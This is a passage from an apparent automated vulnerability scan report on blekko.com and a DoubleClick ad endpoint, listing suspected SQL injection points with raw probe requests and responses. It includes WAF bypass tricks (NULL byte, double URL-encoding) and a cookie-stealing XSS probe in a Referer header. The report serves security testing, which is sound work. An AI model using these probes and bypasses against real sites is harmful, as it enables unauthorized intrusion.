Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2%2527;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2%2527%2527;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:27 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:27 GMT
Content-Length: 24116
X-Blekko-PT: 9e2a197eec3851ae4e785b4d3d881d57

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.6. http://blekko.com/ws/+/press-videos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/press-videos?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:31 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:31 GMT
Content-Length: 24146
X-Blekko-PT: 311769e7f41b71315993b41ac3f8ce2d

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.7. http://blekko.com/ws/+/press-videos [sessionid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%00'; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%00''; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:26 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:26 GMT
Content-Length: 24116
X-Blekko-PT: b99ae2b84b5ff48883c9d27b96b0889c

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.8. http://blekko.com/ws/+/press-videos [suggestedSlashtagsList cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the suggestedSlashtagsList cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%2527; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%2527%2527; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:25 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:25 GMT
Content-Length: 24137
X-Blekko-PT: 355cde925bffe3e60c7fb364a14fdbc7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.9. http://blekko.com/ws/+/press-videos [t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621'; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621''; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:24 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:24 GMT
Content-Length: 24116
X-Blekko-PT: 5dce9899c2a36d366147f2bbf44adfd0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.10. http://blekko.com/ws/+/press-videos [v cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The v cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:23 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:23 GMT
Content-Length: 24116
X-Blekko-PT: 26e1271c4a4322cb094bd1db889aad52

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.11. http://blekko.com/ws/+/privacy [suggestedSlashtagsList cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/privacy

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/privacy HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:48 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:48 GMT
Content-Length: 29105
X-Blekko-PT: 26159a87074ec6fc43874b2d78f49cf0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
account. It is our policy
               to use Personally Identifiable Information to provide our technology and services, and not provide such to anyone outside of blekko without your consent (but see
               ...Exceptions to this Privacy Policy... below). </li>
...[SNIP]...
<li>to investigate, prevent or take action with regard to illegal activity, suspected fraud, potential threat to the physical safety of any individual, violations of the blekko
               Terms of Service, or as otherwise required by law;</li>
...[SNIP]...

Request 2

GET /ws/+/privacy HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.12. http://blekko.com/ws/xss+/date [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/xss+/date

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/xss+/date?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:18 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79337
X-Blekko-QF: chq
X-Blekko-PT: 6063d8d8eeb38be977e761d70635bc78

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

GET /ws/xss+/date?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:19 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.13. http://blekko.com/ws/xss+/date [suggestedSlashtagsList cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/xss+/date

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ws/xss+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:15 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79330
X-Blekko-QF: chq
X-Blekko-PT: 44f5cb25739892961c979aced5c70ef6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

GET /ws/xss+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:16 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.14. http://blekko.com/ws/xss+/site=ha.ckers.org [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/xss+/site=ha.ckers.org

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/xss+'/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:06 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 73511
X-Blekko-QF: hq
X-Blekko-PT: 7773525d7e198d25f7140a30b928b6b6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet7">For those of you who are familiar with the RSA diminutive munitions project from ages ago, back when it was illegal to export certain crypto systems, and the diminutive PERL contests I&#39;ve enacted a similar contest to write a diminutive self replicating <strong>
...[SNIP]...

Request 2

GET /ws/xss+''/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.15. http://googleads.g.doubleclick.net/pagead/ads [color_url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The color_url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the color_url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500'&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:37:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<span>Fix Registry Error - Free</span>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500''&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:37:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.16. http://googleads.g.doubleclick.net/pagead/ads [saldr parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

